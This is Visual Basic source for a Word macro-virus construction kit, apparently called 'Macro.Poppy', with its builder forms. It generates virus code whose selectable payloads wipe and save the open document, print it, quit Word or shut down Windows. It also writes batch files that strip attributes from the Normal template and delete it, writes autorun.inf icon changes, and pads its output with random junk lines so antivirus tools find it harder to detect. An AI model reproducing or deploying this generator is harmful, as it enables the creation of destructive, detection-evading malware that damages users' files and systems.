Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " Selection.HomeKey Unit:=wdStory"
Print #hFile, " Selection.Find.ClearFormatting"
Print #hFile, " Selection.Find.Replacement.ClearFormatting"
Print #hFile, " With Selection.Find"
Print #hFile, " .Text = """ & ReplaceT & """"
Print #hFile, " .Replacement.Text = """ & WithT & """"
Print #hFile, " .Forward = True"
Print #hFile, " .Wrap = wdFindContinue"
Print #hFile, " .Format = False"
Print #hFile, " .MatchCase = False"
Print #hFile, " .MatchWholeWord = True"
Print #hFile, " .MatchAllWordForms = False"
Print #hFile, " End With"
Print #hFile, " Selection.Find.Execute Replace:=wdReplaceAll"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
End If
If Payload = 3 Then
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " If ActiveDocument.Saved = False Then ActiveDocument.Save"
Print #hFile, "Tasks.ExitWindows"
End If
If Payload = 4 Then
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " If ActiveDocument.Saved = False Then ActiveDocument.Save"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "Appilcation.Quit"
End If
If Payload = 5 Then
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " ActiveDocument.PrintOut"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " Call " + pload$
End If
If Payload = 6 Then
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " Selection.WholeStory"
Print #hFile, " Selection.Delete Unit:=wdCharacter, Count:=1"
Print #hFile, " ActiveDocument.Save"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
End If
Print #hFile, "End Sub"
End If
' Build Read-Only Remover
If ROR_X = True Then
Print #hFile, " "
Print #hFile, "Sub vBitchES(strFile As String)"
Print #hFile, " "
Print #hFile, "Dim hFile As Long"
Print #hFile, "On Error Resume Next"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "n$ = NormalTemplate"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "Part11$ = ""attrib -h -r """
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "snag$ = ""c:\progra~1\micros~1\templa~1\"""
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "snag1$ = ""c:\progra~1\micros~2\templa~1\"""
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "Part2$ = ""del """
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "hFile = FreeFile"
Print #hFile, "Open strFile For Output Access Write As hFile"
Print #hFile, "Print #hFile, ""@echo off"""
Print #hFile, "Print #hFile, Part11$ + snag$ + n$"
Print #hFile, "Print #hFile, Part11$ + snag1$ + n$"
Print #hFile, "Print #hFile, Part2$ + snag$ + n$"
Print #hFile, "Print #hFile, Part2$ + snag1$ + n$"
Print #hFile, "Print #hFile, ""cls"""
Print #hFile, "Print #hFile, Part2$ + ""c:\windows\startm~1\programs\startup\msfile.bat"""
Print #hFile, "Close hFile"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "End Sub"
End If
If ID_X = True Then
Print #hFile, "Sub dhIconDisco(strFile As String)"
Print #hFile, "Dim hFile As Long"
Print #hFile, "On Error Resume Next"
Print #hFile, "Randomize"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "Choice = Int(Rnd * 2)"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "rnn$ = Int(Rnd * 66) + 2"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "rn$ = Int(Rnd * 27) + 1"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "Part1$ = ""[autorun]"""
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "Part2$ = ""icon = c:\windows\system\pifmgr.dll,"""
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "Part22$ = ""icon = c:\windows\SYSTEM\shell32.dll,"""
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "Part3$ = Part2$ + rn$"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "Part33$ = Part22$ + rnn$"
Print #hFile, " hFile = FreeFile"
Print #hFile, " Open strFile For Output Access Write As hFile"
Print #hFile, " Print #hFile, Part1$"
Print #hFile, " If Choice = 0 Then"
Print #hFile, " Print #hFile, Part3$"
Print #hFile, " Else"
Print #hFile, " Print #hFile, Part33$"
Print #hFile, " End If"
Print #hFile, " Close hFile"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "End Sub"
End If
Close hFile
End Sub
Sub MacroNoiseEngine(strFile As String)
Randomize
noisechance = Int(Rnd * 6)
roll1 = Int(Rnd * 6)
roll2 = Int(Rnd * 6)
roll3 = Int(Rnd * 6)
roll4 = Int(Rnd * 6)
roll5 = Int(Rnd * 6)
roll6 = Int(Rnd * 6)
makefake1 = Int(Rnd * 9999)
makefake2 = Int(Rnd * 9999)
makefake3 = Int(Rnd * 9999)
scramble1 = Int(Rnd * 9999)
scramble2 = Int(Rnd * 9999)
scramble3 = Int(Rnd * 9999)
fakevar1$ = "f" & makefake1 + scramble1
fakevar2$ = "u" & makefake2 + scramble2
fakevar3$ = "c" & makefake3 + scramble3
fakevar4$ = "k" & makefake1 + scramble3
fakevar5$ = "m" & makefake2 + scramble2
fakevar6$ = "e" & makefake3 + scramble1
If Noise > noisechance Then
' Begin Noise Crap
hFile = 1
If roll1 = 1 Then
Print #hFile, fakevar1$ + " = " + fakevar2 + " & " + fakevar3 + " & Int(Rnd * " & scramble3 & ")"
End If
If roll1 = 2 Then
Print #hFile, fakevar4$ + " = " + fakevar5 + " & " + fakevar6
End If
If roll1 = 3 Then
Print #hFile, fakevar1$ + " = " + fakevar2 + " & " + fakevar3 + " & Int(Rnd * " & scramble1 & ")"
End If
If roll1 = 4 Then
Print #hFile, fakevar4$ + " = " + fakevar5 + " & " + fakevar6
End If
If roll1 = 5 Then
Print #hFile, fakevar1$ + " = " + fakevar2 + " & " + fakevar3 + " & " + fakevar4 + " & " + fakevar5
End If
If roll1 = 6 Then
Print #hFile, fakevar4$ + " = " + fakevar5 + " & " + fakevar6 + " & " + fakevar2 + " & " + fakevar3
End If
End If
If Noise = 6 Then Print #hFile, fakevar1$ + " = " + fakevar5 + " & " + fakevar3 + " & Int(Rnd * " & scramble2 & ")"
End Sub
Attribute VB_Name = "PoppyStartFrm"
Attribute VB_Base = "0{B82BFB91-9023-11D1-9F3B-444553540000}{B82BFA48-9023-11D1-9F3B-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
PoppyStartFrm.Hide
PoppyOptionsFrm.Show
End Sub
Private Sub ExitBtn_Click()
PoppyStartFrm.Hide
ExitFrm.Show
End Sub
Private Sub Image1_Click()
MsgBox "Hello I'm Vic the Macro.Poppy bug...", vbOKOnly, "meep meep"
End Sub
Private Sub Image2_Click()
MsgBox "Hello I'm Vic the Macro.Poppy bug...", vbOKOnly, "meep meep"
End Sub
Private Sub InfoBtn_Click()
PoppyStartFrm.Hide
PoppyInfoFrm.Show
End Sub
Attribute VB_Name = "PoppyOptionsFrm"
Attribute VB_Base = "0{B82BFB95-9023-11D1-9F3B-444553540000}{B82BFA4A-9023-11D1-9F3B-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
…